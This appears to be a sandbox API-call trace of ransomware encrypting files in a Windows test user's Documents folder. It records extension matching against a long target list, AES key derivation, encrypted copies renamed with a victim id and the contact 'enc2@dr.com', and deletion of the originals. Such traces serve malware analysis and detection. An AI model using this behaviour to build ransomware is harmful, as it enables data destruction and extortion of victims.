	[0188.264] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xe79b, dwBufLen=0xe79b | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xe7a0) returned 1
	[0188.265] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.266] RtlMoveMemory (in: Destination=0xfeb928, Source=0xfdd180, Length=0xe79b | out: Destination=0xfeb928) 
	[0188.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.266] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb928*, pdwDataLen=0x18aefc*=0xe79b, dwBufLen=0xe7a0 | out: pbData=0xfeb928*, pdwDataLen=0x18aefc*=0xe7a0) returned 1
	[0188.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.266] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0188.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.267] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0188.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.267] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0188.267] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.267] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.268] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.269] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 117
	[0188.269] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.269] WriteFile (in: hFile=0x388, lpBuffer=0xfeb928*, nNumberOfBytesToWrite=0xe7a0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfeb928*, lpNumberOfBytesWritten=0x18b358*=0xe7a0, lpOverlapped=0x0) returned 1
	[0188.273] CloseHandle (hObject=0x388) returned 1
	[0188.273] CloseHandle (hObject=0x2c0) returned 1
	[0188.273] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls")) returned 1
	[0188.298] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls")) returned 0
	[0188.298] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafada200, ftCreationTime.dwHighDateTime=0x1d970af, ftLastAccessTime.dwLowDateTime=0x854d5d40, ftLastAccessTime.dwHighDateTime=0x1d9726a, ftLastWriteTime.dwLowDateTime=0x854d5d40, ftLastWriteTime.dwHighDateTime=0x1d9726a, nFileSizeHigh=0x0, nFileSizeLow=0x184c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="X R4rDjLngCwE.docx", cAlternateFileName="XR4RDJ~1.DOC")) returned 1
	[0188.298] lstrcmpW (lpString1="X R4rDjLngCwE.docx", lpString2="..") returned 1
	[0188.299] lstrcmpW (lpString1="X R4rDjLngCwE.docx", lpString2=".") returned 1
	[0188.299] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.299] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="X R4rDjLngCwE.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\X R4rDjLngCwE.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\X R4rDjLngCwE.docx"
	[0188.299] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\X R4rDjLngCwE.docx") returned 70
	[0188.299] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.299] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\X R4rDjLngCwE.docx", cchLength=0x46 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx") returned 0x46
	[0188.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.299] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.300] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx"
	[0188.300] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx") returned 70
	[0188.300] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.300] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0188.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.300] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.300] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.301] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.301] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.304] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x184c6, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x184c6, lpOverlapped=0x0) returned 1
	[0188.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.312] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0188.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.315] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.315] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.316] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9430) returned 1
	[0188.316] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.316] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x184c6, dwBufLen=0x184c6 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x184d0) returned 1
	[0188.319] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.319] RtlMoveMemory (in: Destination=0xff5650, Source=0xfdd180, Length=0x184c6 | out: Destination=0xff5650) 
	[0188.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.320] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5650*, pdwDataLen=0x18aefc*=0x184c6, dwBufLen=0x184d0 | out: pbData=0xff5650*, pdwDataLen=0x18aefc*=0x184d0) returned 1
	[0188.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.320] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0188.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.320] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.321] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0188.321] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.321] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.322] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.326] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 112
	[0188.326] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.328] WriteFile (in: hFile=0x388, lpBuffer=0xff5650*, nNumberOfBytesToWrite=0x184d0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff5650*, lpNumberOfBytesWritten=0x18b358*=0x184d0, lpOverlapped=0x0) returned 1
	[0188.352] CloseHandle (hObject=0x388) returned 1
	[0188.352] CloseHandle (hObject=0x2c0) returned 1
	[0188.352] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx")) returned 1
	[0188.376] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x r4rdjlngcwe.docx")) returned 0
	[0188.377] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10689660, ftCreationTime.dwHighDateTime=0x1d97112, ftLastAccessTime.dwLowDateTime=0xccde5430, ftLastAccessTime.dwHighDateTime=0x1d975c5, ftLastWriteTime.dwLowDateTime=0xccde5430, ftLastWriteTime.dwHighDateTime=0x1d975c5, nFileSizeHigh=0x0, nFileSizeLow=0x97da, dwReserved0=0x0, dwReserved1=0x0, cFileName="x8zc5.xls", cAlternateFileName="")) returned 1
	[0188.377] lstrcmpW (lpString1="x8zc5.xls", lpString2="..") returned 1
	[0188.377] lstrcmpW (lpString1="x8zc5.xls", lpString2=".") returned 1
	[0188.378] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.378] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="x8zc5.xls" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\x8zc5.xls") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\x8zc5.xls"
	[0188.379] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\x8zc5.xls") returned 61
	[0188.379] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.379] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\x8zc5.xls", cchLength=0x3d | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls") returned 0x3d
	[0188.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.379] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls", lpSrch="help_decrypt_your_files") returned 0x0
